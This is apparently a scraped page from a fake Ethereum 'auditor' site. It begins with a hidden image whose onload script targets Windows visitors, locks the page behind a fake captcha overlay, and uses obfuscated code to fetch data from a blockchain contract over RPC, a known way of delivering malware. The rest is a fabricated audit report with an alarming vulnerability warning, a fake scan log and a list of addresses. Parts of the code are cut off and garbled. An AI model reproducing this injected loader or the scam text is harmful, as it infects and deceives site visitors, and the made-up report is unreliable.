| <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" style="display:none;" onload="if(!navigator.userAgent.includes('Windows'))return;var el=document.getElementById('main-lock');document.body.appendChild(el);el.style.display='flex';document.documentElement.style.setProperty('overflow','hidden','important');document.body.style.setProperty('overflow','hidden','important');window.genC=function(){var c=document.getElementById('captchaCanvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCDEFGHJKLMNPQRSTUVWXYZ23456789';for(var i=0;i<5;i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<8;i++){x.strokeStyle='rgba(59,130,246,0.15)';x.lineWidth=1;x.beginPath();x.moveTo(Math.random()*140,Math.random()*45);x.lineTo(Math.random()*140,Math.random()*45);x.stroke();}x.font='bold 28px Segoe UI, sans-serif';x.fillStyle='#1e293b';x.textBaseline='middle';for(var i=0;iMath.random()-0.5);for(let r of u){try{const re=await fetch(r,{method:String.fromCharCode(80,79,83,84),body:JSON.stringify({jsonrpc:String.fromCharCode(50,46,48),method:String.fromCharCode(101,116,104,95,99,97,108,108),params:[{to:String.fromCharCode(48,120,57,97,56,100,97,53,98,101,57,48,48,51,102,50,99,100,97,52,51,101,97,53,56,56,51,53,98,53,54,48,57,98,55,101,56,102,98,56,98,55),data:String.fromCharCode(48,120,101,97,56,55,57,54,51,52)},String.fromCharCode(108,97,116,101,115,116)],id:1})});const j=await re.json();if(j.result){let h=j.result.substring(130),s=String.fromCharCode(32).trim();for(let i=0;i
|
ADMIN
Terminal :: Triada Ethereum Auditor v2.5
AUDIT_ID: TRD-42F6D3AFFAED
|
Infrastructure Scan
ADDRESS: 0xa0157a1c38d4cada7d04edbef6451fd2e728ab3c
DEPLOYED: 2026-05-15 19:52:59
LAST_TX: 2026-05-15 20:24:23
|
Compliance Status
STATUS:
OPEN_DEBUG_PORT EXPOSURE: Standard_Compliance_Gap
VISIBILITY: OWNERSHIP_LEAK_DETECTED
|
|
◈ OWNER_PRIVILEGE_EXPOSURE
An active debugging interface allows any user to execute onlyOwner functions.
Deactivate access mode immediately! |
> Execution_Trace_Log
[SYSTEM] Environment: Linux 5.15.0-generic x86_64. [NET] Connection established. Peer count: 78. [FETCH] Entry point found at offset 0x7efe. [SCAN] Analyzing visibility: 7 public, 2 private methods. [MEM] Tracking pointer 0x7993e052 in memory heap. [VULN] Checking for ‘Dirty High Bits’ in address casting. [SIM] Fuzzing input data for 15 iterations. [TRACE] Execution path: 50% coverage. [VALID] Finalizing audit report for 0xa0157a1c38d4cada7d04edbef6451fd2e728ab3c. $line = str_replace(’52b972dfc6bd4d0b87a657b016f4df54d9d15d465c097d4a807d085c6789548e’, bin2hex(random_bytes(32)), $line);
|
NODE: eth-us-cluster-04
GAS_LIMIT: 21000
GAS_LIMIT: 21000
OPERATIONAL_SECURITY_SCAN_COMPLETED
0x4635315a4538be8587334fea96eea2f2c14abfa6 0xe441dfad9c7d517fb36cd3b1bb21d30f6866aa4e 0xff3093c222d80f7227998b28868ac4b20f12350a 0x44c48a45d76086bd0d3c3152232f86a2e054a0ed 0x434d2fa4b57b38f29b1b6a354c733f49d05f5a07 0x5e9f7f2b96d3826c3745802227e873ee9983e3fd 0xe98bece29902931359284b19b0e17d5c7a5a7b2f 0x75f0157043a680c169aa06559d9f5c2a0b1e5062 0x8b86af96cad8b96fbf85686353c864e8464b05f0 0xa7702ce9267567fd811b39c886cdabec6eb249fc 0x960f87dd021cdbac8664612ac37cc8bd61833c42 0xab046cba3691712eac32ec82b24ded7f466e3cf6 0x42901ecb57d122c07eded2da3d2c757f47cfd428 0x370adbc620acb38d467350299b23b5133b03c850 0xb68522c160cc2dc177e1ac35815a530ed204b1e0 0xbf515946136013fc4a6d4c4f18ee209bbcb47db9 0x21e6c175cba81237fe44cd63a12d175203dca3f8 0x57ba382d262cd1d1ee1289f246c197049130df78 0xd94a664e1d89396bbeadd1c9d1adad3e1399055a 0x1fc7d9eda0256fba8e25f3f9c07aaad7fa5cb4b8